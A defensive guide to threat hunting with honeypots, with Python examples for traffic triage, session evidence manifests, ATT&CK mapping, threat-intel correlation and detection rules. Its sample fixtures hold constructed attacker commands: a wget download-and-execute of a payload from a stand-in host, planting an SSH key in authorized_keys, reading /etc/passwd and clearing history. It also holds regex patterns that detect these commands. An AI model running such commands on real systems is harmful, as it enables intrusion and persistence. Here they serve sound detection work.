Threat Hunting with Honeypots
Deploying deceptive infrastructure to attract and observe attackers, then using captured behavior to build detection rules and correlate with threat intelligence. Covers honeypot selection and deployment, traffic analysis, attacker profiling, and converting observations into production detections.
Honeypot Selection and Deployment Planning
Choose honeypot types based on what threats you want to detect. SSH honeypots catch credential stuffing and automated exploitation. Web honeypots attract vulnerability scanners and manual attackers. SMB/RDP honeypots detect lateral movement inside your network. Deploy internal honeypots on unused IP addresses in production subnets - nothing legitimate should contact them, so any traffic to those addresses is suspicious by definition. The exceptions are your own vulnerability scanners, asset-discovery and monitoring systems: allow-list their source ranges before go-live or they will be your first (false) alerts.
Tip: Cowrie is the gold standard SSH/Telnet honeypot - it logs credentials, commands, and downloaded files while presenting a convincing fake filesystem. For internal deployment, place honeypots on IPs that look like real servers (use naming conventions that match your environment). A single hit on an internal honeypot is a high-fidelity alert because legitimate traffic should never reach it.
Network Deception Layer Configuration
Configure your honeypots to blend into the environment convincingly. Match OS fingerprints to what's actually deployed in the network. Add fake service banners that mirror your real infrastructure versions. For internal honeypots, register them in DNS with plausible hostnames and add fake entries in Active Directory or asset inventories. Keep those decoy entries lures only: a fake AD account gets no real group memberships or logon rights, so the deception itself cannot become a path into production. The more realistic the deception, the longer attackers interact and the more intelligence you gather.
Tip: Configure Cowrie's fake filesystem to contain realistic-looking files - attackers who land in an empty system disconnect immediately. Deploy Suricata or Snort3 on a SPAN port or network tap beside the honeypot segment, rather than inline, so the sensor captures full packet data for every session without ever altering or blocking what the honeypot sees. Set up alerting for any connection attempt, not just successful ones - port scans hitting your honeypot IPs indicate reconnaissance in progress.
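The "alert on any contact" rule from this step, as an added example that is not part of the original page or of Suricata: it reads Suricata eve.json flow and alert records, drops traffic from allow-listed scanner ranges, separates handshake-only probes from real sessions, and summarizes per source IP. The decoy addresses, allow-list and every event are constructed for the example; the field names follow the layout Suricata writes for `flow` and `alert` events, and the probe-vs-session threshold is a heuristic of this example.

```python
import ipaddress
import json
from collections import defaultdict

# Decoy addresses and the ranges of your own scanners/monitoring that may
# legitimately touch them. Illustrative values (assumption), not real ones.
DECOY_IPS = {"10.0.5.200", "10.0.5.201", "10.0.7.50"}
ALLOWLIST = [ipaddress.ip_network("10.0.0.0/29")]  # e.g. vulnerability scanner hosts


def _flow(src, dst, port, to_srv, to_cli, b_srv, b_cli, state):
    """Build one eve.json flow record (constructed, in Suricata's field layout)."""
    return {"event_type": "flow", "timestamp": "2024-05-01T09:00:00.000000+0000",
            "src_ip": src, "src_port": 51000, "dest_ip": dst, "dest_port": port,
            "proto": "TCP", "flow": {"pkts_toserver": to_srv, "pkts_toclient": to_cli,
                                     "bytes_toserver": b_srv, "bytes_toclient": b_cli,
                                     "state": state}}


SAMPLE_EVENTS = [
    _flow("10.0.5.23", "10.0.5.200", 445, 1, 0, 60, 0, "new"),          # SYN, no answer
    _flow("10.0.5.23", "10.0.5.201", 445, 1, 1, 60, 54, "closed"),       # SYN answered by RST
    _flow("10.0.5.23", "10.0.7.50", 3389, 1, 0, 60, 0, "new"),
    _flow("10.0.5.23", "10.0.5.200", 22, 40, 35, 5120, 6400, "closed"),  # real SSH session
    _flow("10.0.6.77", "10.0.5.200", 445, 1, 0, 60, 0, "new"),
    _flow("10.0.6.77", "10.0.5.201", 445, 1, 0, 60, 0, "new"),
    _flow("10.0.0.3", "10.0.5.200", 80, 1, 0, 60, 0, "new"),             # allow-listed scanner
    _flow("10.0.9.9", "10.0.9.10", 443, 20, 18, 3000, 9000, "closed"),   # not a decoy
    {"event_type": "alert", "timestamp": "2024-05-01T09:00:02.000000+0000",
     "src_ip": "10.0.5.23", "src_port": 51001, "dest_ip": "10.0.5.200", "dest_port": 445,
     "proto": "TCP", "alert": {"signature": "CONSTRUCTED test signature", "severity": 2}},
]
# eve.json is newline-delimited JSON; reproduce that shape for the parser.
EVE_LINES = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS) + "\n"


def parse_eve(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_allowlisted(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWLIST)


def classify_event(ev, decoys=DECOY_IPS):
    """Return (verdict, detail) for one eve record, or None if it is not decoy traffic."""
    if ev.get("dest_ip") not in decoys or is_allowlisted(ev["src_ip"]):
        return None
    if ev["event_type"] == "alert":
        return ("ids-alert", ev["alert"]["signature"])
    if ev["event_type"] != "flow":
        return None
    f = ev["flow"]
    # Heuristic: a flow that never got past the TCP handshake (a few packets
    # each way at most) is a probe; anything that exchanged data is a session.
    if f["pkts_toserver"] <= 3 and f["pkts_toclient"] <= 2:
        return ("probe", f"{ev['proto']}/{ev['dest_port']}")
    return ("session", f"{ev['proto']}/{ev['dest_port']} "
                       f"{f['bytes_toserver']}B in / {f['bytes_toclient']}B out")


def summarize(events):
    """Per source IP: counts, decoys and ports touched, and a verdict.
    'interactive' if any session, 'sweep' if several decoys/ports probed."""
    counter = {"probe": "probes", "session": "sessions", "ids-alert": "alerts"}
    per_src = defaultdict(lambda: {"probes": 0, "sessions": 0, "alerts": 0,
                                   "decoys": set(), "ports": set()})
    for ev in events:
        res = classify_event(ev)
        if res is None:
            continue
        s = per_src[ev["src_ip"]]
        s[counter[res[0]]] += 1
        s["decoys"].add(ev["dest_ip"])
        s["ports"].add(ev["dest_port"])
    out = {}
    for src, s in per_src.items():
        if s["sessions"]:
            verdict = "interactive"
        elif len(s["decoys"]) >= 2 or len(s["ports"]) >= 3:
            verdict = "sweep"
        else:
            verdict = "probe"
        out[src] = {**s, "decoys": sorted(s["decoys"]), "ports": sorted(s["ports"]),
                    "verdict": verdict}
    return out


if __name__ == "__main__":
    for src, info in summarize(parse_eve(EVE_LINES)).items():
        print(src, info["verdict"], info)
```

Every entry `summarize` returns is an alert by construction; the verdict only decides the priority (an interactive session on a decoy goes to the top of the queue, a sweep confirms reconnaissance). Tail the live eve.json with the same `parse_eve` loop.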
Traffic Capture and Session Recording
Capture everything that touches the honeypots - full PCAP, session logs, uploaded files, and command histories. Configure session replay capability so you can watch attacker sessions in real time or review them later. Store all artifacts with integrity protection: hash each file on collection and record the digests in a signed or hash-chained manifest, with trusted timestamps if the material may later serve as evidence. The data you collect here feeds every subsequent step.
Tip: Cowrie records all SSH sessions as replayable TTY logs (replay them with its playlog utility) and stores any files attackers download or upload, named by SHA-256. Suricata with pcap-log output gives you complete network forensics for every session. Use Falco to monitor the honeypot host itself for any signs of escape attempts. Set up real-time alerting to Slack or your SIEM so you can watch active sessions as they happen.
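Session reconstruction and the integrity manifest described above, as an added example (not Cowrie's own code): it groups Cowrie JSON events into sessions, checks that every download the log claims still hashes to the logged shasum, and builds a hash-chained manifest over the log and each captured file so that altering or deleting an entry is detectable. The events and the "download directory" are constructed in the field layout Cowrie writes to its JSON log; the chain uses a wall-clock time only, and submitting the final chain hash to an RFC 3161 timestamp authority is left out (assumption: you do that out of band when the material is evidence).

```python
import hashlib
import json
from collections import defaultdict
from datetime import datetime, timezone


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-in for Cowrie's download directory: path -> file bytes.
PAYLOAD = b"\x7fELF" + b"\x00" * 12 + b"constructed fake bot payload"
PAYLOAD_SHA = sha256_hex(PAYLOAD)
ARTIFACTS = {f"dl/{PAYLOAD_SHA}": PAYLOAD}

# Constructed events in the field layout Cowrie writes to cowrie.json.
_S = {"session": "a1b2c3d4", "src_ip": "203.0.113.10", "sensor": "hp-01"}
SAMPLE_EVENTS = [
    {**_S, "eventid": "cowrie.session.connect", "timestamp": "2024-05-01T12:00:00.000000Z"},
    {**_S, "eventid": "cowrie.login.failed", "timestamp": "2024-05-01T12:00:01.000000Z",
     "username": "root", "password": "password"},
    {**_S, "eventid": "cowrie.login.success", "timestamp": "2024-05-01T12:00:01.500000Z",
     "username": "root", "password": "123456"},
    {**_S, "eventid": "cowrie.command.input", "timestamp": "2024-05-01T12:00:03.000000Z",
     "input": "uname -a"},
    {**_S, "eventid": "cowrie.command.input", "timestamp": "2024-05-01T12:00:03.200000Z",
     "input": "wget http://198.51.100.7/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86"},
    {**_S, "eventid": "cowrie.session.file_download", "timestamp": "2024-05-01T12:00:04.000000Z",
     "url": "http://198.51.100.7/x86", "shasum": PAYLOAD_SHA, "outfile": f"dl/{PAYLOAD_SHA}"},
    {**_S, "eventid": "cowrie.session.closed", "timestamp": "2024-05-01T12:00:05.000000Z",
     "duration": 5.0},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS) + "\n"


def _new_session():
    return {"src_ip": None, "start": None, "end": None,
            "credentials": [], "commands": [], "downloads": []}


def parse_sessions(log_text):
    """Group Cowrie JSON events by session id into one record per session."""
    sessions = defaultdict(_new_session)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev["eventid"]
        if eid == "cowrie.session.connect":
            s["start"] = ev["timestamp"]
        elif eid in ("cowrie.login.success", "cowrie.login.failed"):
            s["credentials"].append((ev["username"], ev["password"], eid.endswith("success")))
        elif eid == "cowrie.command.input":
            s["commands"].append((ev["timestamp"], ev["input"]))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append({"url": ev.get("url"), "shasum": ev["shasum"],
                                   "outfile": ev["outfile"]})
        elif eid == "cowrie.session.closed":
            s["end"] = ev["timestamp"]
    return dict(sessions)


def missing_downloads(sessions, artifacts):
    """Downloads the log claims but the store lacks, or whose bytes no longer
    hash to the shasum Cowrie recorded at capture time."""
    bad = []
    for sid, s in sessions.items():
        for d in s["downloads"]:
            data = artifacts.get(d["outfile"])
            if data is None or sha256_hex(data) != d["shasum"]:
                bad.append((sid, d["url"]))
    return bad


def build_manifest(session_id, log_text, artifacts, recorded_at=None):
    """One entry per artifact; each entry hash covers the previous entry hash,
    so the chain breaks if any entry is edited, reordered or removed."""
    recorded_at = recorded_at or datetime.now(timezone.utc).isoformat()
    items = [("session.log", log_text.encode())] + sorted(artifacts.items())
    entries, prev = [], "0" * 64
    for name, data in items:
        digest = sha256_hex(data)
        link = sha256_hex(f"{prev}|{session_id}|{name}|{digest}|{recorded_at}".encode())
        entries.append({"session": session_id, "name": name, "sha256": digest,
                        "recorded_at": recorded_at, "prev": prev, "entry_hash": link})
        prev = link
    return entries


def verify_manifest(entries, log_text, artifacts):
    """Recompute every digest and chain link; False on any mismatch."""
    store = dict(artifacts)
    store["session.log"] = log_text.encode()
    prev = "0" * 64
    for e in entries:
        data = store.get(e["name"])
        if e["prev"] != prev or data is None or sha256_hex(data) != e["sha256"]:
            return False
        link = sha256_hex(f"{prev}|{e['session']}|{e['name']}|{e['sha256']}|{e['recorded_at']}".encode())
        if link != e["entry_hash"]:
            return False
        prev = link
    return True
```

Write the manifest to append-only storage separate from the honeypot host: the honeypot is, by design, the machine an attacker controls, so a manifest kept beside the logs proves nothing.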
Attacker Behavior Analysis
Analyze captured sessions to understand attacker techniques, tools, and objectives. Categorize behavior: automated scanning vs manual interaction, credential stuffing vs targeted access, reconnaissance vs exploitation. Extract the specific commands run, tools downloaded, and infrastructure contacted. Build attacker profiles based on TTPs and map them to MITRE ATT&CK techniques.
Tip: Run YARA rules against any files attackers upload or download to identify known malware families. Use Sigma rules against honeypot logs to categorize techniques. Chainsaw and Hayabusa are Windows event log (EVTX) tools, so they help with pattern-hunting across sessions only on Windows-based SMB/RDP decoys; for Cowrie's JSON logs, run the same Sigma rules through your SIEM or a small script. Look for attacker infrastructure - C2 servers, staging hosts, and exfil destinations that you can cross-reference with threat intel feeds.
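The profiling described in this step, as an added example (not code from the original page): given a session's command stream, it separates automated from manual interaction by the timing between commands, maps each command to ATT&CK technique IDs, and pulls out the URLs and IP addresses the attacker reached for. The two sessions are constructed; the command-to-technique table is this example's own choice of mappings, checked against the ATT&CK matrix but worth reviewing against the current version, and the one-second timing threshold is a heuristic.

```python
import re
from datetime import datetime
from statistics import median

# Command pattern -> ATT&CK technique. Mapping chosen for this example.
TECHNIQUES = [
    (r"\b(uname|nproc|lscpu|cat /proc/cpuinfo|cat /etc/os-release)\b", "T1082", "System Information Discovery"),
    (r"\b(whoami|id)\b", "T1033", "System Owner/User Discovery"),
    (r"\bcat /etc/passwd\b", "T1087.001", "Account Discovery: Local Account"),
    (r"\b(ls|find)\b", "T1083", "File and Directory Discovery"),
    (r"\b(ifconfig|ip a|ip addr|netstat|ss -)", "T1016", "System Network Configuration Discovery"),
    (r"\bps\b", "T1057", "Process Discovery"),
    (r"\b(wget|curl|tftp|ftpget)\b", "T1105", "Ingress Tool Transfer"),
    (r"\bchmod\s+(\+x|[0-7]{3,4})", "T1222.002", "Linux File and Directory Permissions Modification"),
    (r"authorized_keys", "T1098.004", "Account Manipulation: SSH Authorized Keys"),
    (r"\bcrontab\b|/etc/cron", "T1053.003", "Scheduled Task/Job: Cron"),
    (r"history -c|rm .*bash_history|unset HISTFILE", "T1070.003", "Indicator Removal: Clear Command History"),
]
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;|&'\"<>]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sessions: (timestamp, command) pairs as Cowrie logs them.
BOT_SESSION = [
    ("2024-05-01T12:00:03.000000Z", "uname -a"),
    ("2024-05-01T12:00:03.200000Z", "wget http://198.51.100.7/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86"),
    ("2024-05-01T12:00:03.400000Z", "cat /proc/cpuinfo | grep name | wc -l"),
]
HUMAN_SESSION = [
    ("2024-05-01T12:10:05.000000Z", "whoami"),
    ("2024-05-01T12:10:14.000000Z", "cat /etc/passwd"),
    ("2024-05-01T12:10:41.000000Z", "ls -la /root/.ssh"),
    ("2024-05-01T12:11:20.000000Z", "echo 'ssh-rsa AAAA... attacker' >> /root/.ssh/authorized_keys"),
    ("2024-05-01T12:11:55.000000Z", "history -c"),
]


def parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def classify_session(commands):
    """Bots paste their whole script within a second of login; humans pause
    to read output between commands. Threshold is a heuristic (assumption)."""
    if not commands:
        return "no-interaction"
    if len(commands) == 1:
        chained = len(re.split(r";|&&|\|\|", commands[0][1])) >= 3
        return "automated" if chained else "undetermined"
    gaps = [(parse_ts(b[0]) - parse_ts(a[0])).total_seconds()
            for a, b in zip(commands, commands[1:])]
    return "automated" if median(gaps) < 1.0 else "manual"


def map_techniques(command):
    return [tid for pattern, tid, _ in TECHNIQUES if re.search(pattern, command)]


def extract_infrastructure(command):
    return {"urls": URL_RE.findall(command), "ips": IP_RE.findall(command)}


def profile_session(commands):
    techniques, urls, ips = set(), set(), set()
    for _, cmd in commands:
        techniques.update(map_techniques(cmd))
        infra = extract_infrastructure(cmd)
        urls.update(infra["urls"])
        ips.update(infra["ips"])
    names = {tid: name for _, tid, name in TECHNIQUES}
    return {"classification": classify_session(commands),
            "command_count": len(commands),
            "techniques": sorted(techniques),
            "technique_names": [names[t] for t in sorted(techniques)],
            "infrastructure": {"urls": sorted(urls), "ips": sorted(ips)}}


if __name__ == "__main__":
    for label, session in (("bot", BOT_SESSION), ("human", HUMAN_SESSION)):
        print(label, profile_session(session))
```

The technique list is what goes into the attacker profile and, later, into the coverage check against production detections; the infrastructure list is what you hand to the correlation step.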
Threat Intelligence Correlation
Correlate honeypot findings with external threat intelligence. Check attacker source IPs against threat feeds, match downloaded tools to known campaigns, and compare TTPs with documented threat actors. This turns raw honeypot data into actionable intelligence - you go from 'someone connected from this IP' to 'this matches APT-X's known toolset and infrastructure.'
Tip: IntelMQ automates threat intel processing and correlation across multiple feeds. Cross-reference source IPs with Shodan to understand the attacker's infrastructure. Check if credentials used against your honeypot appear in breach databases or common wordlists - this distinguishes credential stuffing bots from targeted attacks. Feed confirmed malicious IPs into your production firewalls promptly, but with an expiry: attacker IPs rotate, and a shared cloud or carrier-grade NAT address left on the blocklist cuts off innocent users. Never auto-block your own or partner ranges.
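The correlation and the blocking caveat above, as an added example that is not part of the original page or of IntelMQ: a session is enriched against an IP feed, a table of known tool hashes and a commodity-credential list, given a verdict (commodity, targeted-candidate, unknown) and an action, and confirmed IPs go into a blocklist that expires entries and refuses protected ranges. All feeds, hashes, credentials and ranges are constructed; the "first.last" username convention used to spot organization-style credentials is an assumption you would replace with your own.

```python
import hashlib
import ipaddress
import re
from datetime import datetime, timedelta, timezone

# Constructed feeds standing in for what IntelMQ or a TIP would deliver.
BOT_SHA = hashlib.sha256(b"constructed fake bot payload").hexdigest()
IP_FEED = {"203.0.113.10": {"source": "constructed-feed",
                            "tags": ["ssh-bruteforce", "mirai-like"],
                            "last_seen": "2024-04-30"}}
TOOL_HASHES = {BOT_SHA: "constructed-bot-family"}
# Shortlist standing in for a breach/wordlist lookup.
COMMODITY_CREDS = {("root", "123456"), ("root", "root"), ("admin", "admin"), ("pi", "raspberry")}
# Assumption: the organization issues first.last usernames.
ORG_USER_RE = re.compile(r"^[a-z]+\.[a-z]+$")


def enrich(session):
    """session: {"src_ip", "credentials": [(user, password, success)], "download_hashes": [...]}"""
    creds = [(u, p) for u, p, _ in session["credentials"]]
    commodity = [c for c in creds if c in COMMODITY_CREDS]
    org_style = [c for c in creds if c not in COMMODITY_CREDS and ORG_USER_RE.match(c[0])]
    feed = IP_FEED.get(session["src_ip"])
    tools = [TOOL_HASHES[h] for h in session.get("download_hashes", []) if h in TOOL_HASHES]
    # Credentials that fit the org's naming scheme and appear in no wordlist
    # suggest the attacker knows the target; that outranks any feed hit.
    if org_style and not commodity:
        verdict, action = "targeted-candidate", "escalate-to-ir"
    elif feed or tools or commodity:
        verdict, action = "commodity", "block-with-expiry"
    else:
        verdict, action = "unknown", "watch"
    return {"src_ip": session["src_ip"], "feed": feed, "tools": tools,
            "commodity_credentials": commodity, "org_style_credentials": org_style,
            "verdict": verdict, "action": action}


class ExpiringBlocklist:
    """Blocklist entries carry an expiry; protected ranges are never added."""

    def __init__(self, protected_ranges, default_ttl=timedelta(days=7)):
        self.protected = [ipaddress.ip_network(r) for r in protected_ranges]
        self.default_ttl = default_ttl
        self.entries = {}  # ip -> (expires_at, reason)

    def add(self, ip, reason, now, ttl=None):
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in self.protected):
            return False
        self.entries[ip] = (now + (ttl or self.default_ttl), reason)
        return True

    def active(self, now):
        return sorted(ip for ip, (exp, _) in self.entries.items() if exp > now)

    def purge(self, now):
        """Drop expired entries; returns how many were removed."""
        expired = [ip for ip, (exp, _) in self.entries.items() if exp <= now]
        for ip in expired:
            del self.entries[ip]
        return len(expired)


def process(sessions, blocklist, now):
    """Enrich each session and apply the resulting action to the blocklist."""
    results = []
    for s in sessions:
        e = enrich(s)
        if e["action"] == "block-with-expiry":
            e["blocked"] = blocklist.add(e["src_ip"], e["verdict"], now)
        else:
            e["blocked"] = False
        results.append(e)
    return results


if __name__ == "__main__":
    now = datetime(2024, 5, 1, 12, tzinfo=timezone.utc)
    bl = ExpiringBlocklist(["192.0.2.0/24"])
    demo = [{"src_ip": "203.0.113.10", "credentials": [("root", "123456", True)],
             "download_hashes": [BOT_SHA]},
            {"src_ip": "198.51.100.44", "credentials": [("jane.doe", "Spring2024!", False)],
             "download_hashes": []}]
    for r in process(demo, bl, now):
        print(r["src_ip"], r["verdict"], r["action"], r["blocked"])
    print("active blocks:", bl.active(now))
```

Push `active(now)` to the firewall on a schedule and call `purge` in the same job, so the production ruleset only ever reflects entries that are still within their TTL.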
Detection Rule Development
Convert observed attacker behavior into production detection rules. Write Sigma rules for the SIEM, Suricata rules for network detection, and YARA rules for endpoint scanning. Every technique you observe on the honeypot is a technique that could be used against real infrastructure. Test rules against honeypot data first to validate detection, then deploy to production with appropriate tuning.
Tip: Write Sigma rules at the behavior level, not the IOC level - detect the technique (e.g., 'process spawned from SSH session executing whoami within 5 seconds of login') rather than specific IPs or hashes that rotate daily. Deploy new rules in detection-only mode initially and monitor false positive rates before enabling blocking. Wazuh does not read Sigma natively; convert the rule, by hand or with a converter, into Wazuh's XML rule format to operationalize it across your endpoint fleet.
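The behavior-level rule quoted above, as an added example (not the original page's code, and not a Sigma rule itself): a small temporal correlation engine that fires when a successful login is followed within a window by a discovery command, plus a second rule for a file download shortly after login. Source IP is deliberately absent from both rules, so the same behavior from a new address still fires. Events are constructed in the field layout Cowrie writes to its JSON log; the window sizes are assumptions to tune against your own honeypot data before production deployment.

```python
import re
from datetime import datetime

DISCOVERY_RE = re.compile(r"^\s*(whoami|id|uname|cat /proc/cpuinfo|nproc|lscpu)\b")

# Each rule: trigger event id, predicate for the follow-up event, window in seconds.
RULES = [
    {"id": "hp-ssh-discovery-after-login", "trigger": "cowrie.login.success", "window": 5.0,
     "followup": lambda ev: ev["eventid"] == "cowrie.command.input"
                            and DISCOVERY_RE.search(ev["input"]) is not None},
    {"id": "hp-ssh-ingress-after-login", "trigger": "cowrie.login.success", "window": 120.0,
     "followup": lambda ev: ev["eventid"] == "cowrie.session.file_download"},
]


def _ev(session, src, eventid, ts, **extra):
    return {"session": session, "src_ip": src, "eventid": eventid, "timestamp": ts, **extra}


# Constructed events. Three sessions from three different source IPs.
SAMPLE_EVENTS = [
    # a1: bot; discovery 1.5 s after login, payload fetched 2.5 s after login.
    _ev("a1", "203.0.113.10", "cowrie.login.success", "2024-05-01T12:00:01.500000Z",
        username="root", password="123456"),
    _ev("a1", "203.0.113.10", "cowrie.command.input", "2024-05-01T12:00:03.000000Z",
        input="uname -a"),
    _ev("a1", "203.0.113.10", "cowrie.session.file_download", "2024-05-01T12:00:04.000000Z",
        url="http://198.51.100.7/x86", shasum="constructed"),
    # b2: same behaviour from an address never seen before; must still fire.
    _ev("b2", "198.51.100.44", "cowrie.login.success", "2024-05-01T12:05:00.000000Z",
        username="admin", password="admin"),
    _ev("b2", "198.51.100.44", "cowrie.command.input", "2024-05-01T12:05:04.900000Z",
        input="whoami"),
    # c3: hands-on-keyboard; discovery 45 s after login, outside the window.
    _ev("c3", "192.0.2.77", "cowrie.login.success", "2024-05-01T12:10:00.000000Z",
        username="root", password="toor"),
    _ev("c3", "192.0.2.77", "cowrie.command.input", "2024-05-01T12:10:20.000000Z",
        input="ls -la"),
    _ev("c3", "192.0.2.77", "cowrie.command.input", "2024-05-01T12:10:45.000000Z",
        input="whoami"),
]


def parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def run_rules(events, rules=RULES):
    """Sort by time (log lines may arrive out of order), remember the trigger
    time per (session, rule), and fire once per trigger when a matching
    follow-up lands inside the window."""
    alerts = []
    pending = {}  # (session, rule id) -> trigger time
    for ev in sorted(events, key=lambda e: parse_ts(e["timestamp"])):
        t = parse_ts(ev["timestamp"])
        for rule in rules:
            key = (ev["session"], rule["id"])
            if ev["eventid"] == rule["trigger"]:
                pending[key] = t
            elif key in pending and rule["followup"](ev):
                delta = (t - pending[key]).total_seconds()
                if delta <= rule["window"]:
                    alerts.append({"rule": rule["id"], "session": ev["session"],
                                   "src_ip": ev["src_ip"], "seconds_after_trigger": delta,
                                   "evidence": ev.get("input") or ev.get("url")})
                    del pending[key]
    return alerts


def false_positive_rate(alerts, benign_sessions):
    """Share of alerts that landed on sessions you have labelled benign; use
    this in detection-only mode before the rule is allowed to block."""
    if not alerts:
        return 0.0
    return sum(a["session"] in benign_sessions for a in alerts) / len(alerts)


if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS):
        print(a)
```

Once the logic is validated against captured sessions, the same conditions are written as the Sigma rule for the SIEM; what you keep from this exercise is the exact event pair and window that held up against real honeypot data.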
Reporting and Continuous Improvement
Produce regular threat reports from honeypot findings covering attack trends, new techniques observed, infrastructure attribution, and detection coverage gaps. Feed findings back into your security program - are your production systems protected against the attacks you're seeing on honeypots? Use the data to justify security investments and measure whether your detection engineering is keeping pace with attacker evolution.
Tip: Track metrics over time: sessions per day, unique source IPs, new techniques observed, and mean time from honeypot detection to production rule deployment. Share sanitized findings with ISACs and industry peers. Rotate honeypot configurations periodically - sophisticated attackers maintain lists of known honeypot fingerprints and will avoid systems they recognize as deceptive.